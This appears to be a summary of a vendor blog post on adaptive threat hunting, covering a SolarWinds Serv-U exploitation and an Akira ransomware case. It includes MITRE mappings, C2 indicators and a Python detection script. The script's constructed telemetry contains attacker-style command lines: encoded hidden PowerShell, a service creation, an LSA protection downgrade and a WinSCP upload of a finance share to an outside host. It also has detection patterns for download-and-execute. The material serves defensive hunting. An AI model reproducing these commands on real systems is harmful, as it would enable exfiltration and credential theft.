Threat hunting today blends structured methodologies, real-time data analysis, and adaptive automation to uncover anomalies, threats, and attacker activity across logs, networks, and endpoints. The article contrasts traditional approaches with a modern, adaptive paradigm, then walks through a SolarWinds Serv-U exploitation hunt and an Akira ransomware case study to illustrate proactive, multi-source hunting and continuous improvement. #AkiraRansomware #SolarWindsSERVU
Keypoints
- Threat hunting has evolved from post-incident log reviews to proactive, continuous monitoring and automated analysis.
- Traditional methodologies rely on structured processes, continuous monitoring, hypothesis-driven analysis, data analysis, configuration analysis, and both internal and external hunting.
- Modern threat hunting envisions automation, AI/ML, threat intelligence integration, adaptive continuous hunting, and incident response orchestration within an expanded SOC ecosystem.
- The SolarWinds Serv-U vulnerability example demonstrates how a structured, data-driven threat hunt can identify exploitation of the FTP service and the subsequent in-memory use of Cobalt Strike after initial access.
- The Akira ransomware case illustrates adaptive, multi-directional hunting across several attacker behaviours: remote access tools (RustDesk, AnyDesk), internal reconnaissance, credential access via LSA manipulation, an exposed VPN as the entry point, and data exfiltration.
- Outsourcing advanced threat hunting to specialized vendors can reduce cost and expand capabilities, enabling faster detection and response.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The vulnerability allowed exploitation leading to remote control; “The vulnerable Serv-U secure FTP launched the command prompt and powershell interface to connect to a remote C2 IP…”
- [T1059.001] PowerShell – Use of command prompt and PowerShell to connect to C2 and execute in-memory payloads; “to connect to a remote C2 IP … to further decrypt and execute Cobalt Strike in memory.”
- [T1219] Remote Access Software – Adopting RustDesk and prior use of AnyDesk for persistence and C2 tasks; “downloading RustDesk, a remote access and remote control software…”
- [T1543.003] Create or Modify System Process: Windows Service – Creation of services as part of malware persistence; “create services” in Akira incident steps.
- [T1562.001] Impair Defenses: Disable or Modify Tools – Attempt to hinder defenses by “disable LSA (Local Security Authority) settings”, weakening LSASS protection so credentials can be dumped and defensive controls bypassed.
- [T1046] Network Service Discovery – Internal recon using Advanced IP Scanner and NETSCAN.EXE to map the network; “for mapping the network…”
- [T1041] Exfiltration Over C2 Channel – Data exfiltration using WinSCP during the internal recon and data access stages; “for data exfiltration.” (A WinSCP/SFTP session to attacker-controlled storage is not the C2 channel itself, so hunters may prefer to tag it T1048, Exfiltration Over Alternative Protocol.)
- [T1485] Data Destruction – Akira activities include “destroying backups” and other disruptive actions to hinder recovery. (Deleting or destroying backups specifically is also covered by T1490, Inhibit System Recovery, which is the more precise tag for that step.)
Indicators of Compromise
- [IP Address] C2 – 179[.]60[.]150[.]32 – remote command-and-control server used to serve encoded commands and coordination
- [URL] C2 Channel – http://179[.]60[.]150[.]32/login – URL used to connect to the remote C2 for command retrieval
- [Software/Tools] Remote Access Tools – RustDesk, AnyDesk – tools used for persistence and C2 tasks as part of Akira activity
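As an added example (not code from the SentinelOne post or from the page above), the script below turns the MITRE techniques listed earlier and the indicators just above into hunt hypotheses and runs them over a handful of constructed, Sysmon-style JSON events. The event schema (`type`, `host`, `parent`, `image`, `cmdline`, `key`, `data`, `dest_ip`), the sample hosts, and the rule logic are assumptions of this example; the C2 address is the one the page reports. WinSCP activity is tagged T1048 here rather than T1041 because an SFTP upload to a third-party host is not the C2 channel. The triage step shows the multi-source idea: a host is escalated only when findings from more than one hypothesis converge on it.

```python
"""Hypothesis-driven hunt over constructed process, registry and network telemetry.

Added example: not the post's own code. Field names mimic Sysmon/EDR output but are
an assumption of this script, as are the host names and the sample command lines.
"""
import json
import re
from collections import defaultdict

# C2 indicator from the article (defanged in prose above; plain here so it matches telemetry).
C2_IP = "179.60.150.32"

# Constructed sample telemetry, one JSON event per line (not real logs).
SAMPLE_EVENTS = r"""
{"type":"process","host":"FTP01","parent":"Serv-U.exe","image":"cmd.exe","cmdline":"cmd.exe /c powershell -nop -w hidden -enc SQBFAFgA"}
{"type":"process","host":"FTP01","parent":"cmd.exe","image":"powershell.exe","cmdline":"powershell -nop -w hidden -enc SQBFAFgA"}
{"type":"network","host":"FTP01","image":"powershell.exe","dest_ip":"179.60.150.32","dest_port":80}
{"type":"process","host":"WS07","parent":"explorer.exe","image":"rustdesk.exe","cmdline":"rustdesk.exe --service"}
{"type":"process","host":"WS07","parent":"cmd.exe","image":"netscan.exe","cmdline":"netscan.exe /range:10.0.0.1-10.0.255.254"}
{"type":"process","host":"WS07","parent":"cmd.exe","image":"sc.exe","cmdline":"sc.exe create rdsvc binPath= C:\\ProgramData\\rd.exe start= auto"}
{"type":"registry","host":"WS07","image":"reg.exe","key":"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\RunAsPPL","data":"0"}
{"type":"process","host":"WS07","parent":"explorer.exe","image":"winscp.exe","cmdline":"winscp.exe sftp://backup@203.0.113.9/ /upload C:\\Share\\Finance"}
{"type":"process","host":"WS12","parent":"explorer.exe","image":"AnyDesk.exe","cmdline":"AnyDesk.exe"}
"""


def _image(e):
    return e.get("image", "").lower()


# One hypothesis per technique from the list above: (technique, description, predicate).
RULES = [
    ("T1190", "Serv-U spawned a command shell",
     lambda e: e["type"] == "process" and "serv-u" in e.get("parent", "").lower()
     and _image(e) in ("cmd.exe", "powershell.exe")),
    ("T1059.001", "PowerShell launched with an encoded or download-and-execute command",
     lambda e: e["type"] == "process" and _image(e) == "powershell.exe"
     and re.search(r"(^|\s)-e(nc|ncodedcommand)?(\s|$)|\biex\b|downloadstring",
                   e.get("cmdline", ""), re.I)),
    ("T1219", "Remote access software present (RustDesk/AnyDesk)",
     lambda e: e["type"] == "process" and _image(e) in ("rustdesk.exe", "anydesk.exe")),
    ("T1543.003", "Service created via sc.exe",
     lambda e: e["type"] == "process" and _image(e) == "sc.exe"
     and re.search(r"\bcreate\b", e.get("cmdline", ""), re.I)),
    ("T1562.001", "LSA protection (RunAsPPL) set to 0",
     lambda e: e["type"] == "registry"
     and re.search(r"\\Control\\Lsa\\RunAsPPL$", e.get("key", ""), re.I)
     and str(e.get("data")) == "0"),
    ("T1046", "Internal network scanner executed",
     lambda e: e["type"] == "process"
     and _image(e) in ("advanced_ip_scanner.exe", "netscan.exe")),
    ("T1048", "WinSCP used to push data to a remote host",
     lambda e: e["type"] == "process" and _image(e) == "winscp.exe"
     and re.search(r"sftp://|/upload", e.get("cmdline", ""), re.I)),
    ("IOC", "Connection to the reported Akira C2 address",
     lambda e: e["type"] == "network" and e.get("dest_ip") == C2_IP),
]


def load_events(jsonl):
    """Parse JSON-lines telemetry into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl.strip().splitlines() if line.strip()]


def hunt(events):
    """Run every hypothesis over every event; return (host, technique, description) hits."""
    findings = []
    for e in events:
        for tech, desc, pred in RULES:
            if bool(pred(e)):
                findings.append((e["host"], tech, desc))
    return findings


def triage(findings, threshold=2):
    """Escalate a host when at least `threshold` distinct techniques were observed on it."""
    by_host = defaultdict(set)
    for host, tech, _ in findings:
        by_host[host].add(tech)
    return {h: ("escalate" if len(t) >= threshold else "review") for h, t in by_host.items()}


if __name__ == "__main__":
    hits = hunt(load_events(SAMPLE_EVENTS))
    for host, tech, desc in hits:
        print(f"{host:6} {tech:10} {desc}")
    print(triage(hits))
```

A single AnyDesk process on WS12 stays at "review" because remote access software is often legitimate; FTP01 and WS07 are escalated because several independent hypotheses agree. In a real hunt the predicates would be replaced with queries against the SIEM or EDR, but the structure (hypothesis per technique, then cross-source correlation per host) is the same.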
Read more: https://www.sentinelone.com/blog/a-modern-approach-to-adaptive-threat-hunting-methodologies/